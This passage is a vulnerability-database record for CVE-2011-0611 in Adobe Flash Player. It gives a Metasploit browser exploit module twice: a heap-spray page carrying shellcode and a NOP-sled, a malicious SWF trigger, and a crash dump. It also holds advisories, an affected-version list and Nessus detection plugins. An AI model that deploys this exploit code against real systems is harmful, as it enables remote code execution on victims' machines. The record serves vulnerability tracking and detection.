request.headers['User-Agent']\r\n\t\tif agent !~ /MSIE \\d\\.\\d/ and agent !~ /NT \\d\\.\\d/\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri =~ /\\.swf/\r\n\t\t\tprint_status(\"Sending trigger SWF...\")\r\n\t\t\tsend_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} 
)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\t\tnopsled = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch))\r\n\r\n\t\tswf_name = rand_text_alpha(rand(3))\r\n\t\tjs_func_name = rand_text_alpha(rand(6) +3)\r\n\t\tjs_var_blocks_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_shell_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_nopsled_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_index_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_padding_offset = rand_text_alpha(rand(6) + 3)\r\n\t\ttrigger_file_name = \"#{get_resource}/#{swf_name}.swf\"\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\tfunction #{js_func_name}() {\r\n\t\t\tvar #{js_var_blocks_name} = new Array();\r\n\t\t\tvar #{js_var_shell_name} = unescape(\"#{shellcode}\");\r\n\t\t\tvar #{js_var_nopsled_name} = unescape(\"#{nopsled}\");\r\n\t\t\tvar #{js_var_padding_offset} = #{js_var_shell_name}.length;\r\n\t\t\twhile (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape(\"#{nopsled}\") };\r\n\t\t\t#{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length);\r\n\t\t\t#{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name};\r\n\t\t\tfor (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) {\r\n\t\t\t\t#{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length);\r\n\t\t\t}\r\n\t\t}\r\n\t\t#{js_func_name}();\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body>\r\n\t\t<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"0\" height=\"0\"\r\n\t\tcodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\r\n\t\t<param name=\"movie\" value=\"#{trigger_file_name}\" />\r\n\t\t<embed src=\"#{trigger_file_name}\" quality=\"high\" 
type=\"application/x-shockwave-flash\"\r\n\t\tpluginspage=\"http://www.macromedia.com/go/getflashplayer\">\r\n\t\t</embed>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\thtml = html.gsub(/^\\t\\t/, \"\")\r\n\r\n\t\tprint_status(\"Sending malicious HTML to #{cli.peerhost}:#{cli.peerport}\")\r\n\t\tsend_response(cli, html, {'Content-Type' => \"text/html\"} )\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2011-0611.swf\")\r\n\t\tf = File.open(path, \"rb\")\r\n\t\t@trigger = f.read(f.stat.size)\r\n\t\tf.close\r\n\r\n\t\tsuper\r\n\tend\r\nend\r\n\r\n\r\n=begin\r\n0:000> r\r\neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0\r\neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\r\nFlash10o+0xd01f6:\r\n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????\r\n0:000> dd ecx\r\n01d650b0 11111110 00000000 00000000 00000000\r\n01d650c0 00000000 00000000 00000000 00000000\r\n01d650d0 00000000 00000000 00000000 00000000\r\n01d650e0 00000000 00000000 00000000 00000000\r\n01d650f0 00000000 00000000 00000000 00000000\r\n01d65100 00000000 00000000 00000000 00000000\r\n01d65110 00000000 00000000 00000000 00000000\r\n01d65120 00000000 00000000 00000000 00000000\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17175/"}], "seebug": [{"lastseen": "2017-11-19T18:05:25", "description": "Bugtraq ID: 47314\r\nCVE ID\uff1aCVE-2011-0611\r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002\r\nWindows, Macintosh, Linux\u548cSolaris\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u7684Adobe Flash Player 10.2.153.1\u548c\u4e4b\u524d\u7248\u672c(Adobe Flash Player 10.2.154.25\u548c\u7528\u4e8eChrome\u7528\u6237\u7684\u65e9\u671f\u7248\u672c)\uff0cAndroid\u4e0b\u7684Adobe Flash 
Player 10.2.156.12\u53ca\u65e9\u671f\u7248\u672c\uff0cWindows\u548cMacintosh\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u7684Adobe Reader\u53caAcrobat X (10.0.2)\u548cReader\u53caAcrobat\u65e9\u671f10.x\u548c9.x\u7248\u672c\u63d0\u4f9b\u7684Authplay.dll\u7ec4\u4ef6\u5b58\u5728\u4e25\u91cd\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\u6b64\u6f0f\u6d1e(CVE-2011-0611)\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\uff0c\u6216\u5141\u8bb8\u653b\u51fb\u8005\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\uff0c\u6839\u636e\u62a5\u544a\u6b64\u6f0f\u6d1e\u5728\u7f51\u7edc\u4e0a\u5df2\u79ef\u6781\u5229\u7528\uff0c\u628a\u6076\u610fFLASH(.swf)\u6587\u4ef6\u5d4c\u5165\u5230Microsoft Word(.doc)\uff0c\u5e76\u901a\u8fc7Email\u9644\u4ef6\u8f7d\u4f53\u8fdb\u884c\u653b\u51fb\u8005\u3002\u76ee\u524d\u8fd8\u6ca1\u6709\u6ce8\u610f\u5230\u5229\u7528\u6b64\u6f0f\u6d1e\u901a\u8fc7PDF\u9488\u5bf9Adobe Reader\u548cAcrobat\u8fdb\u884c\u653b\u51fb\u3002 Adobe Reader X\u4e5f\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff0c\u4f46\u80fd\u6210\u529f\u9632\u6b62\u6076\u610f\u4ee3\u7801\u6267\u884c\u3002 \r\n\r\nAdobe Reader 9.3.4\r\nAdobe Reader 9.3.4\r\nAdobe Reader 9.3.3\r\nAdobe Reader 9.3.2\r\nAdobe Reader 9.3.1\r\nAdobe Reader 9.1.3\r\nAdobe Reader 9.1.2\r\nAdobe Reader 9.1.1\r\nAdobe Reader 9.4.2\r\nAdobe Reader 9.4.1\r\nAdobe Reader 9.4\r\nAdobe Reader 9.3\r\nAdobe Reader 9.2\r\nAdobe Reader 9.1\r\nAdobe Reader 9\r\nAdobe Reader 9\r\nAdobe Reader 10.0.1\r\nAdobe Reader 10.0\r\nAdobe Flash Player 10.1.53 .64\r\nAdobe Flash Player 10.1.51 .66\r\nAdobe Flash Player 10.0.45 2\r\nAdobe Flash Player 10.0.45 2\r\nAdobe Flash Player 10.0.45 2\r\nAdobe Flash Player 10.0.32 18\r\nAdobe Flash Player 10.0.22 .87\r\nAdobe Flash Player 10.0.15 .3\r\nAdobe Flash Player 10.0.12 .36\r\nAdobe Flash Player 10.0.12 .35\r\nAdobe Flash Player 10.2.156.12\r\nAdobe Flash Player 10.2.154.25\r\nAdobe Flash Player 10.2.154.18\r\nAdobe Flash Player 10.2.154.13\r\nAdobe Flash Player 10.2.153.1\r\nAdobe Flash Player 10.2.152.33\r\nAdobe Flash 
Player 10.2.152.21\r\nAdobe Flash Player 10.1.95.2\r\nAdobe Flash Player 10.1.95.1\r\nAdobe Flash Player 10.1.92.10\r\nAdobe Flash Player 10.1.92.10\r\nAdobe Flash Player 10.1.85.3\r\nAdobe Flash Player 10.1.82.76\r\nAdobe Flash Player 10.1.106.16\r\nAdobe Flash Player 10.1.105.6\r\nAdobe Flash Player 10.1.102.65\r\nAdobe Flash Player 10.1.102.64\r\nAdobe Flash Player 10.1 Release Candida\r\nAdobe Flash Player 10.0.42.34\r\nAdobe Flash Player 10.0.32.18\r\nAdobe Flash Player 10\r\nAdobe Acrobat Standard 9.3.4\r\nAdobe Acrobat Standard 9.3.4\r\nAdobe Acrobat Standard 9.3.3\r\nAdobe Acrobat Standard 9.3.2\r\nAdobe Acrobat Standard 9.3.1\r\nAdobe Acrobat Standard 9.1.3\r\nAdobe Acrobat Standard 9.1.2\r\nAdobe Acrobat Standard 9.4.2\r\nAdobe Acrobat Standard 9.4.1\r\nAdobe Acrobat Standard 9.4\r\nAdobe Acrobat Standard 9.3\r\nAdobe Acrobat Standard 9.2\r\nAdobe Acrobat Standard 9.1\r\nAdobe Acrobat Standard 9\r\nAdobe Acrobat Standard 10.0.2\r\nAdobe Acrobat Standard 10.0.1\r\nAdobe Acrobat Standard 10.0\r\nAdobe Acrobat Professional 9.3.4\r\nAdobe Acrobat Professional 9.3.3\r\nAdobe Acrobat Professional 9.3.2\r\nAdobe Acrobat Professional 9.3.1\r\nAdobe Acrobat Professional 9.1.3\r\nAdobe Acrobat Professional 9.1.2\r\nAdobe Acrobat Professional 9.4.2\r\nAdobe Acrobat Professional 9.4.1\r\nAdobe Acrobat Professional 9.4\r\nAdobe Acrobat Professional 9.3\r\nAdobe Acrobat Professional 9.2\r\nAdobe Acrobat Professional 9.1\r\nAdobe Acrobat Professional 9 Extended\r\nAdobe Acrobat Professional 9\r\nAdobe Acrobat Professional 10.0.2\r\nAdobe Acrobat Professional 10.0.1\r\nAdobe Acrobat Professional 10.0\r\nAdobe Acrobat 9.3.3\r\nAdobe Acrobat 9.3.3\r\nAdobe Acrobat 9.3.2\r\nAdobe Acrobat 9.3.1\r\nAdobe Acrobat 9.1.1\r\nAdobe Acrobat 8.2.4\r\nAdobe Acrobat 9.4.2\r\nAdobe Acrobat 9.4.1\r\nAdobe Acrobat 9.4\r\nAdobe Acrobat 9.3\r\nAdobe Acrobat 9.2\r\nAdobe Acrobat 9\r\nAdobe Acrobat 10.0.2\r\nAdobe Acrobat 10.0.1\r\nAdobe Acrobat 
10.0\r\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\nhttp://www.adobe.com/", "published": "2011-04-13T00:00:00", "title": "Adobe Flash Player 'SWF'\u6587\u4ef6\u8fdc\u7a0b\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20472", "id": "SSV:20472", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:04:47", "description": "No description provided by source.", "published": "2011-04-24T00:00:00", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20497", "id": "SSV:20497", "sourceData": "\n ##\r\n# $Id: adobe_flashplayer_flash10o.rb 12330 2011-04-16 02:09:33Z sinn3r $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Adobe Flash Player that was discovered, and\r\n has been exploited actively in the wild. 
By embedding a specially crafted .swf file,\r\n Adobe Flash crashes due to an invalid use of an object type, which allows attackers to\r\n overwrite a pointer in memory, and results arbitrary code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Version' => "$Revision: 12330 $",\r\n 'Author' =>\r\n [\r\n 'sinn3r',\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-0611' ],\r\n [ 'OSVDB', '71686' ],\r\n [ 'BID', '47314' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],\r\n [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],\r\n [ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],\r\n [ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],\r\n [ 'URL', 'http://secunia.com/blog/210' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "\\x00",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => "process",\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Apr 11 2011",\r\n 'DefaultTarget' => 0))\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n \r\n agent = request.headers['User-Agent']\r\n if agent !~ /MSIE \\d\\.\\d/ and agent !~ /NT \\d\\.\\d/\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n if request.uri =~ /\\.swf/\r\n print_status("Sending trigger SWF...")\r\n send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )\r\n return\r\n end\r\n \r\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n nopsled = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch))\r\n \r\n swf_name = rand_text_alpha(rand(3))\r\n js_func_name = rand_text_alpha(rand(6) +3)\r\n js_var_blocks_name = 
rand_text_alpha(rand(6) + 3)\r\n js_var_shell_name = rand_text_alpha(rand(6) + 3)\r\n js_var_nopsled_name = rand_text_alpha(rand(6) + 3)\r\n js_var_index_name = rand_text_alpha(rand(6) + 3)\r\n js_var_padding_offset = rand_text_alpha(rand(6) + 3)\r\n trigger_file_name = "#{get_resource}/#{swf_name}.swf"\r\n \r\n html = <<-EOS\r\n <html>\r\n <head>\r\n <script>\r\n function #{js_func_name}() {\r\n var #{js_var_blocks_name} = new Array();\r\n var #{js_var_shell_name} = unescape("#{shellcode}");\r\n var #{js_var_nopsled_name} = unescape("#{nopsled}");\r\n var #{js_var_padding_offset} = #{js_var_shell_name}.length;\r\n while (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape("#{nopsled}") };\r\n #{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length);\r\n #{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name};\r\n for (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) {\r\n #{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length);\r\n }\r\n }\r\n #{js_func_name}();\r\n </script>\r\n </head>\r\n <body>\r\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"\r\n codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">\r\n <param name="movie" value="#{trigger_file_name}" />\r\n <embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"\r\n pluginspage="http://www.macromedia.com/go/getflashplayer">\r\n </embed>\r\n </body>\r\n </html>\r\n EOS\r\n \r\n html = html.gsub(/^\\t\\t/, "")\r\n \r\n print_status("Sending malicious HTML to #{cli.peerhost}:#{cli.peerport}")\r\n send_response(cli, html, {'Content-Type' => "text/html"} )\r\n end\r\n \r\n def exploit\r\n path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0611.swf")\r\n f = File.open(path, "rb")\r\n @trigger = 
f.read(f.stat.size)\r\n f.close\r\n \r\n super\r\n end\r\nend\r\n \r\n \r\n=begin\r\n0:000> r\r\neax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0\r\neip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202\r\nFlash10o+0xd01f6:\r\n100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????\r\n0:000> dd ecx\r\n01d650b0 11111110 00000000 00000000 00000000\r\n01d650c0 00000000 00000000 00000000 00000000\r\n01d650d0 00000000 00000000 00000000 00000000\r\n01d650e0 00000000 00000000 00000000 00000000\r\n01d650f0 00000000 00000000 00000000 00000000\r\n01d65100 00000000 00000000 00000000 00000000\r\n01d65110 00000000 00000000 00000000 00000000\r\n01d65120 00000000 00000000 00000000 00000000\r\n=end\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20497"}, {"lastseen": "2017-11-19T15:58:00", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Reader X Atom Type Confusion Vulnerability Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71835", "id": "SSV:71835", "sourceData": "\n # Exploit Title: Adobe Reader X Atom Type Confusion Vulnerability Exploit\r\n# Date: 7/3/2011\r\n# Author: Snake ( Shahriyar.j < at > gmail )\r\n# Version: Adobe Reader X < 10.1\r\n# Tested on: 10.0.0 - 10.0.1 - Windows 7 - IE/FF/Opera\r\n# CVE : CVE-2011-0611\r\n#\r\n#This is the exploit I wrote for Abysssec "The Arashi" article.\r\n#It gracefully bypass DEP/ASLR ( not the sandbox ) in Adobe Reader X,\r\n#and we named this method "Tatsumaki DEP/ASRL Bypass" : >\r\n#It work reliably on IE9/FF4 and other browsers.\r\n#\r\n# The Arashi : http://abysssec.com/files/The_Arashi.pdf\r\n 
http://www.exploit-db.com/download_pdf/17469\r\n# me : twitter.com/ponez\r\n# also check here for The Persian docs of these methods and more :\r\nhttp://www.0days.ir/article/\r\n\r\nExploit-DB mirror: http://www.exploit-db.com/sploits/cve-2011-0611_exploit.pdf\r\n\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71835"}], "nessus": [{"lastseen": "2021-01-07T10:41:07", "description": "Adobe Product Security Incident Response Team reports :\n\nA critical vulnerability exists in Flash Player 10.2.153.1 and earlier\nversions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users)\nfor Windows, Macintosh, Linux and Solaris, Adobe Flash Player\n10.2.156.12 and earlier versions for Android, and the Authplay.dll\ncomponent that ships with Adobe Reader and Acrobat X (10.0.2) and\nearlier 10.x and 9.x versions for Windows and Macintosh operating\nsystems.\n\nThis vulnerability (CVE-2011-0611) could cause a crash and potentially\nallow an attacker to take control of the affected system. There are\nreports that this vulnerability is being exploited in the wild in\ntargeted attacks via a malicious Web page or a Flash (.swf) file\nembedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file\ndelivered as an email attachment, targeting the Windows platform. At\nthis time, Adobe is not aware of any attacks via PDF targeting Adobe\nReader and Acrobat. 
Adobe Reader X Protected Mode mitigations would\nprevent an exploit of this kind from executing.", "edition": 25, "published": "2011-04-18T00:00:00", "title": "FreeBSD : linux-flashplugin -- remote code execution vulnerability (32b05547-6913-11e0-bdc4-001b2134ef46)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplugin", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin"], "id": "FREEBSD_PKG_32B05547691311E0BDC4001B2134EF46.NASL", "href": "https://www.tenable.com/plugins/nessus/53468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53468);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"FreeBSD : linux-flashplugin -- remote code execution vulnerability (32b05547-6913-11e0-bdc4-001b2134ef46)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Product Security Incident Response Team reports :\n\nA critical vulnerability exists in Flash Player 10.2.153.1 and earlier\nversions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users)\nfor Windows, Macintosh, Linux and Solaris, Adobe Flash Player\n10.2.156.12 and earlier versions for Android, and the Authplay.dll\ncomponent that ships with Adobe Reader and Acrobat X (10.0.2) and\nearlier 10.x and 9.x versions for Windows and Macintosh operating\nsystems.\n\nThis vulnerability (CVE-2011-0611) could cause a crash and potentially\nallow an attacker to take control of the affected system. 
There are\nreports that this vulnerability is being exploited in the wild in\ntargeted attacks via a malicious Web page or a Flash (.swf) file\nembedded in a Microsoft Word (.doc) or Microsoft Excel (.xls) file\ndelivered as an email attachment, targeting the Windows platform. At\nthis time, Adobe is not aware of any attacks via PDF targeting Adobe\nReader and Acrobat. Adobe Reader X Protected Mode mitigations would\nprevent an exploit of this kind from executing.\"\n );\n # http://www.adobe.com/support/security/advisories/apsa11-02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/advisories/apsa11-02.html\"\n );\n # https://vuxml.freebsd.org/freebsd/32b05547-6913-11e0-bdc4-001b2134ef46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe00646c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/20\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplugin<=9.0r289\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<10.2r159.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:07:12", "description": "Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_3_FLASH-PLAYER-110415.NASL", "href": "https://www.tenable.com/plugins/nessus/75497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive 
text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-4399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75497);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0611\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0373-1)\");\n script_summary(english:\"Check for the flash-player-4399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted Flash files could be exploited to execute arbitrary\ncode (CVE-2011-0611).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=686818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-04/msg00066.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 